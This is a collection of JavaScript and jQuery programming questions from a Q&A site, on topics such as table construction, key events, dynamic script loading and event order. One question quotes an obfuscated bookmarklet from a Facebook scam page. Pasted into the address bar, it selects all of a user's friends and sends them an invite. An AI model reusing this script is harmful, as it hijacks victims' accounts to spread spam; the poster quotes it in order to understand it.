  • Javascript table construction bug using JQuery in Firefox on Mac OSX

    - by Poita_
    I'm using some code to build up tables using JQuery, but in Firefox 3.5.3 on Mac OSX, the table cells all appear on separate lines by themselves, instead of in their respective rows. Chrome 5.0.342.7 beta on OSX correctly produces the table, as does Safari 4.0.5. Here is a minimal reproduction case: <html> <body> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script> <script type="text/javascript"> $(document).ready(function() { var b = $('body'); b.append("<table>"); for (var i = 0; i < 3; ++i) { b.append("<tr>"); for (var j = 0; j < 3; ++j) b.append("<td>x</td>"); b.append("</tr>"); } b.append("</table>"); }); </script> </body> </html> In Chrome and Safari, I get this correct output: x x x x x x x x x but Firefox produces: x x x x x x x x x Note that if I manually create that exact table without using Javascript (i.e. direct into the HTML) then the table appears correctly in Firefox. Also, if I change the JS to append then entire table in one call then it also works -- the only time it doesn't work is if you append it part-by-part as I have done before. My question is: is this to be expected, or should I report this as a bug to Firefox? I'm pretty sure this is a Firefox bug, but I'm a bit of a newbie to JS and web development in general, so perhaps there's something I'm missing? P.S. obviously there are easy ways to get around this -- that's not my concern. See above.

  • retrieve Scrollbar position with javascript

    - by Paul
    I know how to do this in flash, but completely lost about regular html. I'm trying to detect the position of the browser scrollbar with Javascript to decide where abouts in the page the current view is. My guess is that I'd have to detect where the thumb on the track is, and then the height of the thumb as a percentage of the total height of the track. Am I over-complicating it, or does Javascript offer an easier solution than that? Any ideas code-wise. Thanks.

  • How do I avoid multiple key up/down/press events when holding a key?

    - by Rammay
    I'm creating a web front end to control a small robot. Ajax calls will be made on a keydown, to start the robot, and keyup to stop it. My problem is that when a key is held down the keyup, keydown, and keypress events seem to cycle continually. Does anybody know of a way to only have keydown fire when the key is first pressed and keyup to fire when it has been released?

  • How can I use Object Oriented Javascript to interact with HTML Objects

    - by Steve
    I am very new to object orientated javascript, with experience writing gui's in python and java. I am trying to create html tables that I can place in locations throughout a webpage. Each html table would have two css layouts that control if it is selected or not. I can write all of the interaction if I only have one table. It gets confusing when I have multiple tables. I am wondering how to place these tables throughout a blank webpage and then access the tables individually. I think I am having trouble understanding how inheritance and hierarchy works in javascript/html. NOTE: I am not asking how to make a table. I am trying to dynamically create multiple tables and place them throughout a webpage. Then access their css independently and change it (move them to different locations or change the way the look, independently of the other tables).

  • jQuery: what is it "forbidden" to do in plain Javascript

    - by flybywire
    A jQuery best practices question. I am writing a very jQuery intensive web page. I am new to jQuery and notice its power, but as I come with heavy javascript experience and knowledge, my question is: What should be done in jQuery and what in plain javascript. For example, there are callbacks that send a plain DOM object as an argument. Should I use that or should I wrap it ( like $(this)). Does it matter if I do this.x=y or $(this).attr("x", y).

  • Call methods on native Javascript types without wrapping with ()

    - by Anurag
    In Javascript, we can call methods on string literals directly without enclosing it within round brackets. But not for other types such as numbers, or functions. It is a syntax error, but is there a reason as to why the Javascript lexer needs these other types to be enclosed in round brackets? For example, if we extend Number, String, and Function with an alert method and try calling this method on the literals, it's a SyntaxError for Number and Function, while it works for a String. function alertValue() { alert(this); } Number.prototype.alert = alertValue; String.prototype.alert = alertValue; Function.prototype.alert = alertValue; We can call alert directly on a string object: "someStringLiteral".alert() // alerts someStringLiteral but it's a SyntaxError on numbers, and functions. 7.alert(); function() {}.alert(); To work with these types, we have to enclose it within brackets: (7).alert(); // alerts "7" (function() {}).alert(); // alerts "function() {}"

  • Javascript for a prompt which accepts simple math as a value and then returns the answer

    - by user1139403
    I have written a snippet of code in javascript, for a prompt to appear when clicked. I want to be able to enter a simple math problem (i.e. 230/2) and have it output the answer, rather than the math problem I just entered. Your help will be much appreciated. <!DOCTYPE html> <html> <body> <button onclick="myFunction()">Click me</button> <p id="demo"></p> <script type="text/javascript"> function myFunction() { var x; var mathProblem=prompt("Enter your math problem",""); if (name!=null) { x = mathProblem; document.getElementById("demo").innerHTML = x; } } </script> </body> </html>

  • Running javascript in AJAX loaded DIV

    - by WiseDonkey
    I have page loading, via AJAX a PHP page into a div. In turn, this loaded page has it's own javascript and AJAX loaded div. Reason is to allow user to select data alter data within loaded data. I'm trying to do this without the help of JSON or such to communicate between JS and PHP. I'm guessing the parent calling page has already loaded the javascript, and the AJAX loaded content can't access that? (I've tried running the JS into the AJAX loaded content as well) If so, is there anyway to access that?

  • What exactly does this piece of JavaScript do?

    - by helpmarnie
    I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla... and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript. Simply put, what does this do? javascript:(function(){ a='app120668947950042_jop'; b='app120668947950042_jode'; ifc='app120668947950042_ifc'; ifo='app120668947950042_ifo'; mw='app120668947950042_mwrapper'; eval(function(p,a,c,k,e,r){ e=function(c){ return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))} ; if(!''.replace(/^/,String)){ while(c--)r[e(c)]=k[c]||e(c); k=[function(e){ return r[e]} ]; e=function(){ return'\\w+'} ; c=1} ; while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); return p} ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"]; d=U; d[e[2]](V)[e[1]][e[0]]=e[3]; d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]]; s=d[e[2]](e[6]); m=d[e[2]](e[7]); c=d[e[9]](e[8]); c[e[11]](e[10],I,I); s[e[12]](c); C(D(){ W[e[13]]()} ,E); C(D(){ X[e[16]](e[14],e[15])} ,E); C(D(){ m[e[12]](c); d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]} ,E); ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{ } ))})();

  • Can't access variables from dynamically loaded javascript

    - by Menno
    I'm using a fairly simple system to load javascript dynamically: include = function (url) { var e = document.createElement("script"); e.src = url; e.type="text/javascript"; document.getElementsByTagName("head")[0].appendChild(e); }; Let's say I have a file test.js which has the following contents: var foo = 4; Now, in my original script, I want to use include(test.js); console.log(foo); However, I get a 'foo has not been defined' error on this. I'm guessing it has to do with the dynamic script being included as the last child of the <head> tag. How can I get this to work?

  • How can I get jquery .val() AFTER keypress event?

    - by werner5471
    I got: $(someTextInputField).keypress(function() { alert($(this).val()); }); Now the alert always returns the value BEFORE the keypress (e.g. the field is empty, I type 'a' and the alert gives me ''. Then I type 'b' and the alert gives me 'a'...). But I want the value AFTER the keypress - how can I do that? Background: I'd like to enable a button as soon as the text field contains at least one character. So I run this test on every keypress event, but using the returned val() the result is always one step behind. Using the change() event is not an option for me because then the button is disabled until you leave the text box. If there's a better way to do that, I'm glad to hear it!

  • Event firing sequence for a submit button.

    - by JSTyro
    Say a submit button has a click event handler as well (yes, it's wrong, but that's really the code I'm working on). And the click handler sets a value in a field of the form that's about to be submitted. So when the submit button is clicked: What will fire first, the form submit event or the click event? Will the value set in the form field by the click event submitted to the server? I think this depends on the answer to Q1. If the form is posted first, I'm guessing it won't. Note: I'm not looking for alternatives and advice. I know what the proper way of handling this will be. Just trying to understand the sequence of events and their implications.
